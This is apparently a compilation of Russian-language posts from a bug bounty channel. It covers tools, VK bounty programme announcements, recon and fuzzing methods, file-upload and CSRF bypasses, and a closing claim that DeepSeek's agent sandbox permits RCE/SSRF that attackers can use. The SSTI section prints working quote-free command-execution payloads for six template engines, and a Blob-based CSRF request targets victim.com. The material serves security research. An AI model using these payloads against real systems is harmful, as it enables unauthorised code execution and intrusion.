🕷 Как популярные браузеры анализируют HTML и как эта информация может помочь выявить mXSS?

Об XSS с мутациями (mutation-based XSS или mXSS) в сообществе багхантеров известно уже давно, но так ли часто вам удается их найти в реальных багбаунти-программах? С Dom-Explorer точно удастся.

🤔 В чем сложность mXSS?

mXSS использует код, который воспринимается HTML-санитайзерами как безопасный, а после прохождения очистки мутирует во вредоносный. В этом и состоит парадоксальность и опасность этого типа XSS атак.

Dom-Explorer как раз полезен для обнаружения и поиска mXSS. Он демонстрирует, как популярные средства парсинга HTML реагируют на любую заданную HTML-строку, чтобы помочь вам выявить непредвиденное поведение, которое может открыть новые перспективные области для исследований. Поддерживаемые типы парсеров/санитайзеров: Ammonia, Angular, DomParser, DomPurify, HighlightJs, JsXss, Parse5, SafeValues, SrcdocParser, TemplateParser.

Главная фича — скорость тестирования новых идей и мгновенное отображение результатов. Инструмент, на который он больше всего похож, — это Live DOM Viewer с более скудными возможностями. А вдохновлялся автор всем известным Cyberchef.

До появления Dom-Explorer проведение такого рода исследований занимало гораздо больше времени — «особенно если вы тестируете глубоко вложенные элементы» — и включало гораздо больше этапов, говорит разработчик инструмента. Иногда это было практически «невозможно сделать с помощью классических инструментов».

💡 Dom-Explorer рекомендуется использовать в сочетании с HTML Living Standard от WHATWG и проверять, соответствуют ли браузеры этому стандарту.

🔗 Попробовать Dom-Explorer в деле
🔗 GitHub
🔗 Анонс инструмента

#инструменты

Спойлерим программу конференции VK Security Confab Max

💥 Опубликовали на сайте программу нашей конференции VK Security Confab Max 11 декабря

Что нас ждет? Как и обещали – лютый хардкор!
🤘 Нон-стоп!

Два трека с техническими докладами от ведущих экспертов VK и крупнейших BigTech-компаний.

Ключевые темы:

⭐️ Работа SOC в BigTech: управление алертами и потоком событий, требования к SIEM, а также обнаружение атак.

🛡 Защита инфраструктуры: Service Mesh, эволюция сканирования распределенной инфраструктуры и обнаружение открытых портов.

🎮 Уязвимости: Построение Vulnerability Management в современных реалиях, эксплуатация уязвимостей SSRF и mXSS и защита от них.

🔍 Bug Bounty: концепция Bug Bounty 2.0, защищенность соцсетей и серьезные уязвимости в системах, которые можно обнаружить не только багхантерам.

⚙️ Безопасность приложений (AppSec): безопасность API c применением ML и AI, поиск и приоритизация уязвимостей в зависимостях, разбор популярных сканеров и их недостатков.

💭 Защита облачных технологий: харденинг k8s, защита от атак в публичном облаке, а также техническое устройство сетевой изоляции в облаке.

📍 Москва, офис VK + трансляция онлайн

📅 11 декабря 2024 года

Участие бесплатное, но мест мало
👉 жмите, чтобы зарегистрироваться и узнать программу

➡️ Подписывайтесь на канал VK Security, чтобы не пропустить новости о мероприятии

#confab #max #конференция

Bounty pass#3: Advent — на финишной прямой

19 декабря закончится наш предновогодний багхантерский марафон и завершим Bounty pass#3: Advent мы шумной вечеринкой BB Advent Party. 🕺

А пока смотрите, что скрывало последнее окошко в нашем адвент-календаре для багхантеров — промокод на 150 000 рублей! 😲

🏃 Есть еще сегодня, выходные и 4 суток, чтобы собрать все подарки адвента! Го сдавать ваши отчеты в программы VK Bug Bounty на платформах Standoff, BI.ZONE Bug Bounty и Bugbounty.ru!

@VK Security

#bugbounty #bountypass #advent

™️ Новая программа от VK уже на BugBounty.ru!

Хантеры, готовы к новогоднему подгону от VK?

VK Video теперь доступна на платформе BugBounty.ru!

Область поиска: веб-ресурсы и мобильные платформы Android и iOS, и TV.

Двухуровневый скоуп:
vkvideo.ru, m.vkvideo.ru, api.vkvideo.ru — до 2,4 млн
live.vkvideo.ru — до 1,2 млн

Время открывать баги и зарабатывать по-крупному!

Программа уже тут.

Не смогли попрощаться с Bounty pass в 2024 году, поэтому теперь Bounty pass – навсегда! 🔥

Мы ярко провели юбилейный для VK Bug Bounty год: запустили программу лояльности для багхантеров, отменили лимиты на максимальные выплаты благодаря накопительному бонусу, провели серию специальных ивентов... И поняли, что не время прощаться!

С этого дня мы запускаем Bounty pass: Forever! 🎉

Что будет?

🛍 Накопительный бонус по уровню критичности: до +5% к каждому следующему вознаграждению. ☝️Запоминаем: чем больше находишь критических уязвимостей – тем больше бонус!

🗓 Срок действия бонуса – 1 год с момента сдачи отчета

➕ Все бонусы суммируются

🏆 Все участники Bounty pass в 2024 году получают 5% к каждому оплачиваемому отчету до конца 2025 года. А если багхантер отправил за год более 10 оплачиваемых отчетов или заработал более 1 миллиона рублей, то он получает на старте сразу 10%.

🎁 Мерч (как же без него 😏):
каждый квартал будем дарить крутой мерч всем багхантерам, которые сдадут 4+ оплачиваемых отчета или получат вознаграждение больше 400 000 рублей.

👉 Все детали новых условий собрали на новом сайте

Ждем ваши новые отчеты в программе VK Bug Bounty на платформах Standoff, BI.ZONE Bug Bounty и Bugbounty.ru!

@VK Security

#bugbounty #bountypass #forever

👋 Первый рабочий день — самое время вспомнить все с нуля искать новые баги, а поможет в этом качественная методология.

1️⃣ Первое, на чем необходимо сосредоточиться, это разведка. Чем качественнее вы ее проведете, тем больше вероятность найти уникальные баги.

Один из примеров действительно грамотных методологий разведки привел Jason Haddix (The Bug Hunter's Methodology v4.0 - Recon Edition). В полтора часа выступления он вместил ключевые аспекты разведки. Они в большей степени подходят для программ с большим скоупом, но здесь важно уловить концепцию.

Помните, что автоматизация без контекста может только вредить, поэтому важно понимать, что именно вы сканируете и что автоматизируете.

2️⃣ Второй этап — анализ веб-приложения. Этому посвящена отдельная методология The Bug Hunter's Methodology - Application Analysis. Вы узнаете, как объединить ручной и автоматический анализ для повышения эффективности поиска багов, какие инструменты использовать.

Методологии jhaddix — это не просто руководство, а целая философия багхантинга. Используйте их, чтобы улучшить свои навыки и находить действительно уникальные баги.

#этобаза

🤯 Каждый багхантер хотя бы раз сталкивался с проверками при загрузке файлов: расширения, MIME-тип, структура файла, магические байты. Но задумывались ли вы, как можно обойти ограничения на загрузку файлов для эксплуатации Client-Side Path Traversal (CSPT)?

Команда Doyensec поделилась исследованием, раскрывающим кейсы эксплуатации слабых мест проверок для выполнения сложных атак, включая CSPT, CSRF и XSS.

1⃣ JSON как инструмент для обхода

JSON — популярный формат передачи данных, который можно использовать для обхода проверок загрузки. Многие приложения проверяют загружаемые файлы, используя библиотеки и инструменты для проверки MIME-типа и структуры. Однако правильно сформированный JSON может пройти эти проверки и быть обработан на стороне клиента.

2⃣ Обход проверок PDF

Исследование показывает, как создать файл, который будет распознаваться как PDF, но при этом оставаться валидным JSON для клиента:
• mmmagic (обычно используется в приложениях Node.js для определения типов файлов): достаточно поместить заголовок %PDF в первые 1024 байта.
• pdflib: Использование допустимой структуры PDF с минимальными корректировками (например, замена %0A на %20).

3⃣ Проблемы с командой file

Команда file ограничивает количество байтов для анализа. Это ограничение можно использовать, добавив в файл большое количество пробелов. Проверка файла завершится ошибкой, и файл классифицируется как PDF.

4⃣ Обход проверки изображений (WEBP)

Создание JSON-файла с магическими байтами WEBP в нужном месте позволяет пройти проверку формата изображения:

{"aaa": "WEBP", "_id": "../../../../CSPT?"}

🎯 Ключевые методы обхода

Что использовать:
• Создание файлов, которые валидны сразу для нескольких форматов.
• Анализ исходного кода библиотек проверки (например, mmmagic, pdflib, file-type).
• Эксплуатация технических ограничений, таких как лимиты чтения данных.

Где применимо:
• CSPT → обход путей на стороне клиента.
• CSRF → выполнение межсайтовых запросов.
• XSS → внедрение вредоносного JavaScript.

Любые функции, которые поддерживают расширенную пользовательскую разметку, могут быть уязвимы для SSTI, включая wiki-страницы, обзоры, маркетинговые приложения, CMS-системы и т. д.

По умолчанию многие шаблонизаторы имеют включенное автоматическое экранирование или выполняют экранирование HTML перед процессом рендеринга шаблона. Иногда это значительно усложняет сценарий эксплуатации из-за фильтрации кавычек, используемой для рендеринга строковых данных.

Без строковых данных в какой-либо форме RCE значительно сложнее достичь для некоторых шаблонизаторов, ярким примером которых является Twig. Однако для других эксплуатация остается относительно простой даже без использования кавычек.

Так почему бы не создать набор пэйлоадов для популярных шаблонизаторов с импактом RCE, которые используют только дефолтные функции и методы из шаблонизатора и не используют какие-либо кавычки или ресурсы, доступные за пределами самого шаблонизатора? Это гарантировало бы работу пэйлоада в максимально возможном количестве сценариев эксплуатации.

Разберем несколько примеров, а остальные читайте в исследовании багхантера из YesWeHack:

🟠Jinja2 (Python) позволяет выполнять Python-код через глобальные переменные:

Получение строки id:

{{self.__init__.__globals__.__str__()[1786:1788]}}
  

Выполнение команды id с помощью os.popen:

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}}
  

🟠Twig (PHP) отличается сложностью из-за автоматического экранирования, но RCE возможна через функции passthru:

Эксплуатация через двойной рендеринг:

{{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}}
  

🟠Smarty (PHP) использует функцию chr для построения строк.

Выполнение команды id:

{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}}  
  

🟠Razor (ASP.NET) поддерживает выполнение C#-кода, позволяя напрямую запускать системные команды:

Генерация команды whoami:

@{string x=null;int[]l={119,104,111,97,109,105};foreach(int c in l){x+=((char)c).ToString();};}@x
  

Выполнение команды:

@System.Diagnostics.Process.Start("cmd.exe", "whoami");
  

🟠Groovy (Java) использует execute для запуска полученной строковой команды как системной:

${x=new String();for(i in[105,100]){x+=((char)i).toString()};x.execute().text}

🟠FreeMarker (Java) преобразует числа в строки через lower_abc, что позволяет создавать пэйлоад для выполнения команд:

${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)}

👀 Вам когда-нибудь требовалась быстрая визуализация вашей цели? В случае большого скоупа вручную это делать крайне неэффективно.

📸 gowitness — простой Go-инструмент, который делает скриншоты, регистрирует HTTP-статусы и собирает сведения о сервере. Это делает его идеальным для разведки, когда у вас есть длинный список доменов для анализа.

👩‍💻 Быстрый старт

Установка:

go install github.com/sensepost/gowitness@latest

Запуск:

gowitness scan single --url "https://example.com" --write-db

P. S. Можно скачать бинарь, если не хотите устанавливать gowitness.

⚒️ Похожие инструменты:
• EyeWitness
• WitnessMe
• Snapback
• Aquatone

#инструменты #разведка

Уязвимости при загрузке файлов возникают из-за небезопасной реализации функционала загрузки, особенно когда компонент выполняет слабую или вовсе не выполняет проверку загруженного файла. Критичность этого класса уязвимостей может быть разнообразной: от stored XSS до RCE.

Условия для успешной эксплуатации:
❣️ Доступ к файлу: необходимо знать полный путь к файлу, чтобы обратиться к нему.
❣️ Тип контента: если сервер меняет MIME-тип файла на безопасный, выполнение кода может стать невозможным.

Базовые методы эксплуатации:
❣️ Загрузка файла с вредоносным кодом, например, PHP-скрипта.
❣️ Обход client side ограничений (HTML-атрибут accept) с помощью прокси для изменения данных HTTP-запроса.

Обход защитных механизмов:
❣️ Черные списки расширений: использование нестандартных расширений или манипуляция именем файла.
❣️ Белые списки расширений: использование разрешенных расширений с вредоносным содержимым.
❣️ Проверка MIME-типа: загрузка файла с корректным MIME-типом, но вредоносным содержимым.

Примеры сложных атак:
❣️ Перезапись конфигурационных файлов (например, .htaccess) для изменения настроек сервера.
❣️ Использование магических байтов: изменение первых байтов файла для прохождения проверки типа.

💡 Важные советы:
❣️ Комбинируйте методы обхода для выявления слабых мест.
❣️ Учитывайте особенности технологий на стороне сервера и создавайте специализированный пэйлоад.
❣️ Не знаете, с каким списком имеете дело: черным или белым? Попробуйте загрузить файл с произвольным расширением. Если он был принят, скорее всего, используется черный список. Если загрузка отклонена, скорее всего, это строго определенный белый список.

🔗 Погрузиться подробнее
🔗 Fuxploider — инструмент для автоматизации обнаружения и эксплуатации недостатков форм загрузки файлов
🔗 Upload Scanner — сканер загрузки файлов для Burp Suite
🔗 FileUpload — расширение OWASP ZAP для поиска уязвимостей в функциональности загрузки файлов
🔗 Заметки на PayloadsAllTheThings

Процесс выявления несвязанных, неиспользуемых или просто скрытых параметров, которые принимаются веб-приложением и могут позволить пользователю управлять поведением приложения с помощью этих скрытых параметров, часто называют parameter discovery.

Cкрытые параметры могут позволить управлять поведением приложения и привести к успешной реализации многих сценариев атак: от XSS и SQL-инъекций до внедрения команд и IDOR.

⚙️ Ниже — несколько полезных инструментов, которые помогут автоматизировать и упростить эту работу:

💜 x8 (Rust): помогает выявлять скрытые параметры, которые потенциально могут быть уязвимыми, или интересные функции, которые могут быть упущены другими багхантерами.

Его высокая точность достигается за счёт построчного сравнения страниц, сравнения кодов HTTP-ответов и анализа результатов вывода.

💜 Arjun (Python): находит допустимые HTTP-параметры с помощью огромного дефолтного словаря. Словарь можно изменить в случае необходимости.

💜 ParamSpider (Python): ищет параметры в веб-архивах, поддоменах и других источниках.

💜 Param-Miner (расширение Burp Suite): используется для поиска скрытых и несвязанных параметров, особенно при поиске уязвимостей вроде Web Cache Poisoning.

Инструмент включает расширенную логику сравнения из Backslash Powered Scanner с методом бинарного поиска, чтобы угадывать до 65 000 названий параметров в каждом запросе. Названия параметров берутся из встроенного словаря и из всего трафика в скоупе.

🥷🏿 Простой пример автоматизации

1. Parameter discovery с помощью ParamSpider:

python3 paramspider.py --domain <target_domain> --level high --output params.txt

2. Запуск шаблонов XSS gf для извлечения параметров, которые могут быть уязвимы для XSS:

gf xss.json params.txt | tee xss.txt

3. Запуск dalfox в отношении тех URL-адресов, которые потенциально уязвимы для XSS:

cat xss.txt | dalfox pipe

#инструменты #разведка

Существует множество способов, с помощью которых веб-приложения реализуют защиту от CSRF-атак. Методы защиты, которые являются скорее неявными, чем явными, обычно более рискованны, особенно если они полагаются на неизменность политики браузеров в отношении допустимых действий.

Одной из интересных попыток защиты от CSRF является отклонение запросов с заголовком Content-Type, отличным от application/json. Эффективность этого подхода связана с тем, что браузеры разрешают отправку запросов с заголовками только application/x-www-form-urlencoded, multipart/form-data и text/plain (а также, возможно, несколькими другими исключениями) в cross-site запросах. Можно отправлять произвольные значения, но только в том случае, если сайт-получатель предоставил разрешение через CORS.

💡 Если защита от CSRF реализована как показано в примере выше, есть новый способ обхода. Он основан на том, что API fetch принимает в качестве параметра body не только String, но и объекты типа Blob.

Это важно, так как Blob — более сложный объект, чем строка: он содержит не только данные, но и связанную с ними информацию о типе, либо может вовсе не иметь типа. Создав объект Blob без типа и передав его в функцию fetch, можно отправить cross-site POST-запрос без CORS, который не будет содержать заголовок Content-Type. Это применимо не только для пустого тела запроса, поскольку данные, переданные в Blob, становятся телом HTTP-запроса.

Использование fetch для POST-запроса без Content-Type:

fetch("https://victim.com", {
  method: "POST",
  body: new Blob(["payload"])
});

Результирующий POST-запрос с Content-Length, но без Content-Type:

POST / HTTP/1.1
Host: victim.com
Connection: keep-alive
Content-Length: 7
sec-ch-ua: "Google Chrome …."
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 …
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: https://example.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://example.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9

payload

#техники

В одном из недавних постов мы разбирались с понятием parameter discovery. Приведенные инструменты помогут в выявлении скрытых эндпоинтов, недокументированных параметров и незамеченных путей, которые расширяют зону атаки.

Сегодня мы пойдем дальше и познакомимся с такими практическими методами, как фаззинг параметров, forced browsing и поиск путей/параметров, а также разберемся, как использовать целевые словари, парсить файлы и анализировать JavaScript, чтобы находить точки входа для более результативного багхантинга.

1️⃣ После получения полной структуры приложения с помощью Burp Suite, проанализируйте файлы robots.txt и sitemap.xml на наличие пропущенных путей, используйте Google-дорки и инструменты из предыдущего поста для улучшения процесса поиска параметров.

2️⃣ Сделайте акцент на анализе JavaScript-файлов. Это помогает понять, какие параметры стоит начать фаззить, какие роуты, скорее всего, обрабатывают конфиденциальные данные и где могут быть неправильные настройки.

Полезные инструменты:

🖤 LinkFinder — простой Python-скркипт, который сканирует JavaScript-файлы и извлекает URL-адреса, пути и параметры.

🖤 jsluice — Go-пакет и CLI-инструмент для извлечения URL-адресов, путей, секретов и других интересных данных из исходников JavaScript.

🖤 JavaScript bookmarklet — сниппет JavaScript-кода, сохранённый в виде закладки в браузере. При нажатии на любую веб-страницу код запускается в браузере и извлекает информацию без использования внешних инструментов или переключения контекста.

👉 Пример извлечения эндпоинтов из JavaScript:

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0–9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

🖤 Расширения Burp Suite для анализа JavaScript: JSLinkFinder, GAP, JSpector и другие.

3️⃣ Фаззинг — отправка различных, часто неожиданных входных данных, включая пути, параметры или HTTP-заголовки, на эндпоинты приложения.

👉 Цель: спровоцировать пограничные случаи, выявить функции, которые никогда не предназначались для публичного использования, и обнаружить слабые места в логике приложения.

👉 Основные возможности:

🖤 Обнаружение скрытых или секретных эндпоинтов.
🖤 Выявление неправильных настроек или проблем с контролем доступа.
🖤 Автоматизация изучения поведения целевого веб-приложения.
🖤 Понимание механизмов работы целевого веб-приложения.

👉 Основные этапы:

💚 Определите базовый уровень: начните с эндпоинтов, которые вы уже обнаружили с помощью ручного сканирования, анализа JavaScript и forced browsing.

💚 Forced browsing: даже хорошо защищённые приложения иногда полагаются на предсказуемые соглашения об именовании, оставшиеся файлы резервных копий или директории по умолчанию, которые, по мнению разработчиков, не будут найдены.

Используя эти предположения, forced browsing предполагает систематическое угадывание путей к файлам, директориям и расширениям для доступа к скрытым или ограниченным ресурсам. Простой пример: settings.php.bak, settings.bak, settings.php.old, settings.old, settings_old.php, settings.php~.

💚 Изучение распространенных административных или других директорий.

4️⃣ Словари: предоставляют входные данные для тестирования эндпоинтов и параметров.

🖤 Общие: common.txt, fuzz.txt.
🖤 Для конкретного языка программирования, фреймворка или стека: ColdFusion и другие.

5⃣ Фаззинг с помощью CLI-инструментов: поиск путей/директорий/расширений, parameter discovery.

Полезные инструменты: feroxbuster, ffuf, dirb, gobuster.

6⃣ Фаззинг с помощью Burp Intruder.

#техники #инструменты #разведка

🐧 Бесплатные cloud-native linux системы. Иногда есть необходимость что-то проверить в своих системах с внешнего хоста, а покупать сервер не хочется или нет возможности. На помощь придут сервисы типа segfault.net (ssh - root:segfault; анонимизированный, есть ограничения, таймаут) или terminator.aeza.net (web-based linux (+Win); ограничение - 15 минут).

🤖 DEEPSEEK RCE/SSRF.

Хайповая AGI deepseek позволяет выполнять произвольные команды, на виртуальном окружении, в котором запущен агент вашей сессии чат-бота с генеративным искусственным интеллектом. Это дает возможность, в том числе и злоумышленникам, использовать мощности этой экосистемы для атак или вредоносных действий.